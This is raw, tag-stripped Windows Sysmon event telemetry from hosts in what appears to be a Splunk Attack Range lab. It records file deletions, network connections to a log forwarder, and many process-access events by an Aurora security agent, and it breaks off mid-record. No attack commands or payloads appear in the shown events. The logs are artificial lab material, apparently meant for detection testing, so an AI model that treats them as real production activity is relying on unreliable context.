12:30:48.992{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C29B49C2B657A7DD37396E7D4D5BB0F,SHA256=69CC6F9D7270D990CF264C093589A6C8ACF9580EA9D1274AD27823495DA3A32A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:45.679{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56505-false10.0.1.12-8000- 23542300x800000000000000048507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:48.424{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3260CB2A061B56A10F7593796E6F6EDA,SHA256=BEDEBF530A24CE884BDF79DAE68625817B5AF1B9F13FC42D812255863490F2E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.539{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C946143FCFCA9950AB2707820EEDFBD9,SHA256=BADDD61DD520CEA8CE39C4644A410D5D9E6B791D63B4A20140CCC46DBBD52EE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.524{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=88635F79A338352545DC8025DBF6211F,SHA256=AEF1393398AE0E88D70C0E034550306F5C90178D4B77FF83F635565DEEF81BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.524{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.524{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.524{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.524{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=91B9887C408CA290516E815EB5BDF7D9,SHA256=A0EFABA64BA69B2CB5A46313660C7A77394FD47AA082481346D4A2B5D9613055,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:49.524{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018937Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:47.930{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50199-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000048516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:50.660{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7390950304DB76B7ED8BD0A0F7E63BD4,SHA256=8815DCB074D93FD4102C5F4E52267095B97806B89094E3B997259DC933557F80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018938Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:50.078{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6A14A6DF5791D659A51EA68EF73A9DF,SHA256=8B49FD574108DEA5CD69FCC7A14F102096A376EC55AEEB9F379F8DDE66FD87A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.916{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.909{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.904{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.893{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.878{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.799{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000048520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000048519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.781{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6B45529F1F95592738442D7CA4AC42,SHA256=71A6FF98C83E005111A6148B52C2E0170054C113B4AF34A7BDCB7142D401B656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:51.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 